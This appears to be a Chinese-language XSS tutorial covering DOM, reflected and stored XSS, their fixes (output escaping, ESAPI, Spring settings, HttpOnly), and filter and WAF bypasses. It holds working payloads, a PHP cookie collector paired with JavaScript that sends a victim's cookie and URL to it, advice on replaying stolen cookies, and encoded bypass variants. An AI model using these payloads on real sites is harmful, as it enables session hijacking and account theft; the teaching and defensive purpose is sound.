XSS防护和绕过1

原理：对用户输入没作过滤和处理，是用户能够输入一些东西（例如js），控制输出达到一些攻击目的

1.DOM型

　

基于DOM的XSS有时也称为type0XSS。当用户可以经过交互修改浏览器页面中的DOM(DocumentObjectModel)并显示在浏览器上时，就有可能产生这种漏洞，从效果上来讲它也是反射型XSS。主要区别就是没有通过服务器后端处理

　　经过修改页面的DOM节点造成的XSS，称之为DOMBasedXSS。

　　前提是易受攻击的网站有一个HTML页面采用不安全的方式从document.location 或document.URL 或 document.referrer获取数据（或者任何其余攻击者能够修改的对象）。

简单例子：

 1 <HTML>
 2 <TITLE>Welcome!</TITLE>
 3 Hi
 4 <SCRIPT>
 5 var pos=document.URL.indexOf("name=")+5;
 6 document.write(document.URL.substring(pos,document.URL.length));
 7 </SCRIPT>
 8 <BR>
 9 Welcome to our system
10 …
11 </HTML>

这个例子是个欢迎页面，name是截取URL中get过来的name参数

正常操做：

http://www.vulnerable.site/welcome.html?name=Joe

非正常操做：

http://www.vulnerable.site/welcome.html?name=<script>alert(document.cookie)</script>

　　将产生xss条件。让咱们看看为何：受害者的浏览器接收到这个连接，发送HTTP请求到www.vulnerable.site而且接受到上面的HTML页。受害者的浏览器开始解析这个HTML为DOM，DOM包含一个对象叫document，document里面有个URL属性，这个属性里填充着当前页面的URL。当解析器到达javascript代码，它会执行它而且修改你的HTML页面。假若代码中引用了document.URL，那么，这部分字符串将会在解析时嵌入到HTML中，而后当即解析，同时，javascript代码会找到(alert(…))而且在同一个页面执行它，这就产生了xss的条件。

注意:

　　1. 恶意程序脚本在任什么时候候不会嵌入处处于天然状态下的HTML页面（这和其余种类的xss不太同样）。

　　2.这个攻击只有在当url不是直接在地址栏输入，Mozilla.会自动转换在document.URL中字符<和>（转化为%3C 和 %3E），所以在就不会受到上面示例那样的攻击了，在IE6下没有转换<和>，所以他很容易受到攻击。

　　固然，直接嵌入到HTML只是攻击的一个挂载点，有不少脚本不须要依赖<和>漏洞，所以Mozilla一般也是没法阻止这些攻击的。

　　【这段出自：http://www.oschina.net/translate/dom-based-xss-of-third-kind】

如：<div id="aa">这是内容</div>   ，咱们能够经过  document.getElementById('aa').innerHTML 来获取id为aa的对象的内嵌内容；
也能够对某对象插入内容，如  document.getElementById('abc').innerHTML='这是被插入的内容';   这样就能向id为abc的对象插入内容。

2 反射型：某url存在xss漏洞，攻击者经过植入xss代码，让受害者访问触发，反射型跨站http://127.0.0.1/xss1.php?name=op<script>alert(1)</script>

3.存储型：某url下的留言本或评论区存在xss漏洞，攻击者经过植入xss代码，让受害者访问触发，存储型跨站。留言板

 与csrf结合的思考，构造带xss的连接请求放在B站上藏匿，受害者访问脆弱的a站，又同时访问B站，渲染B站时或点击、移动鼠标使恶意连接触发，向A站发送请求同时浏览器被攻击者控制，能够任意和A站交互

 

漏洞的发现：手工或这工具扫描AWVS等

awvs注意里面id的位置，手工测试输入，对可控的变量进行测试回显，看浏览器回显的html文档，一边测试一边绕过

 

漏洞的利用：beef或者xss平台、xsser 

把beef的127.0.0.1：3000/hook.js 和xss平台经过各类方式get post等等在浏览器构造，骗取用户打开，利用效果取决于受害者权限，获取cookie、地理位置、劫持浏览器是没有问题的。

注意：

xss平台使用要注意插入闭合</scrpit>"<本身的xss代码>//）

获取到cookie之后能够用啊d也能够用cookietamper等这些修改cooike的插件带着cookie去访问网站。并且要注意访问/admin，不是/admin/login.php

手写获取cookie的js方法：

生成cookie的php：

<?php
$cookie = $_GET['c']; //接受c的参数复制给cookie，为后面作模拟方便
$url= $_GET['u'];     //赋值url
$file = fopen("cookie.html","w+"); //将接受值写入html文件
fwrite($file,"url地址：");
fwrite($file,$url);
fwrite($file,":");
fwrite($file,$cookie);
fwrite($file,"<hr>");
fclose($file);
?>

利用的获取cookie的js代码：

<script>
var cookie=document.cookie; //声明变量获取cookie，赋值给cookie
var url =window.location.href; //js获取url的方法
alert(url);
var c="http://127.0.0.1/cookiexss.php?c=";
//var u="http://127.0.0.1/cookiexss.php?u=";
window.location.href=c+cookie+"&u="+url;//window.location.href打开指定地址http://127.0.0.1/cookiexss.php?c=cookie值&u=url值


</script>

 只要在脆弱站点A植入以上js代码，js经过执行调用的php，生成一个html，里面包含用户在浏览A站的cookie和url

 

 

 

修复

1.在输入点过滤敏感关键字

2.innerHTML=encodeHTML([输出])

a) 全局拦截 （全局过滤器、拦截器），适用于不包含富文本的状况

Servlet的doFilter、Spring的Interceptor类，对全部的访问请求进行监听。正确的姿式是在过滤器中对<>&’”=等字符转义处理，可以使用ESAPI或者common-lang.jar的StringEscapeUtils类或者Spring的HtmlUtils来实现。

b)富文本交互，白名单过滤

ESAPI.validator().getValidSafeHTML(“getValidSafeHTML”, keyword, keyword.length(), true)

白名单：JavaVulnerableLab/vulnerability/xss/xss4.jsp

3.7 XSS防御—Spring MVC

a)项目级过滤

<context-param>
<param-name>defaultHtmlEscape</param-name>
<param-value>true</param-value>
</context-param>

b)页面级过滤

在包含form的jsp页面中添加

<spring:htmlEscape defaultHtmlEscape=”true” />

c)表单元素级过滤

在form元素中添加

<form:form htmlEscape=“true”>或

<form:input path=”someFormField” htmlEscape=”true” />

3.springMVC中的WebBindingInitializer和@InitBinder

• 将用户所提供的内容输入输出进行过滤。能够运用下面这些函数对出现XSS漏洞的参数进行过滤：
• PHP的htmlentities()或是htmlspecialchars()
• Python的cgi.escape()
• ASP的Server.HTMLEncode()
• ASP.NET的Server.HtmlEncode()或功能更强的Microsoft Anti-Cross Site Scripting Library
• Java的xssprotect(Open Source Library)
• Node.js的node-validator

4.推荐XSS规则过滤引擎：OWASP AntiSamp或者Java HTML Sanitizer

3.HttpOnly
若是在cookie中设置了HttpOnly属性，那么经过javaScript脚本将没法读取到cookie信息，这样能有效的防止XSS攻击，可是注意，只是不能读取，可是能够覆盖，攻击者若是发现网站的XSS漏洞，就能够利用HttpOnly cookie发动session fixation攻击。

 

 

 

绕过：

四种超级基础的绕过方法。 
1.转换为ASCII码 
例子：原脚本为<script>alert(‘I love F4ck’)</script > 
经过转换，变成： 
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script> 

2.转换为HEX（十六进制） 
例子：原脚本为<script>alert(‘I love F4ck’)</script> 
经过转换，变成： 
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e 

 

转换为base64

<META HTTP-EQUIV="refresh"
CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4
K">

能够看到会刷新，刷新时解密base64

3.转换脚本的大小写 
例子：原脚本为<script>alert(‘I love F4ck’)</script> 
转换为：<ScRipt>AleRt(‘I love F4ck’)</sCRipT> 

4.增长闭合标记”> 
例子：原脚本为<script>alert(‘I love F4ck’)</script> 
转换为：”><script>alert(‘I love F4ck’)</script> 

5.变量增长

分红三条语句

 

6.相似

有转义：

payload：

http://www.xiaodi8.com/hack/xss/example7.php?name=1';alert($a);//

闭合变量

 

 过waf：

不论是XSS仍是sql注入等，思路老是同样的，无非几种：

1.关键字打乱

2.替换更改

3.猜分组合

4.编码解码

5.函数调用